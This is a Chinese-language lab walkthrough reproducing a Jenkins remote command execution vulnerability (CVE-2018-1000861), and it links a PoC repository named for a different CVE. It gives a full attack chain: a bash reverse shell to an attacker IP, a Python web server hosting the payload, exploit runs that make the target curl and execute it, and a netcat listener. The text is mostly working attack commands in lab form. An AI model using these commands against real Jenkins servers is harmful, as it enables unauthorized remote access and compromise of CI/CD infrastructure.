jekins CVE-2018-1000861 漏洞复现

‍

名称: jenkins 命令执行 （CVE-2018-1000861）

描述: ​Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令

‍

**利用项目：**​https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

打开靶场：

​​​​

用python快速构建一个web服务，在这个网站下创建一个yyds.txt，yyds.txt里面的内容为反弹shell的命令，也就是下面这串代码

​bash -i >& /dev/tcp/192.168.91.138/9002 0>&1​

​​

开启web服务：

python3 -m http.server 9001

​​​​

访问测试一下没问题：

​​​​​​

用python2版本执行exp.py这个脚本，目的是让目标主机下载这个yyds.txt文件并保存到自己的/tmp/2.sh这个路径下

python2 exp.py http://192.168.91.129:36252/ “curl -o /tmp/2.sh http://192.168.91.138:9001/yyds.txt”

​​​​

‍

开启监听：

nc -lvvp 9002

​​​

‍

再次执行这个脚本，让目标机器执行这个2.sh文件，也就是执行了我保存在yyds.txt文件里反弹shell的命令

python2 exp.py http://192.168.91.129:36252/ “bash /tmp/2.sh”

​​

‍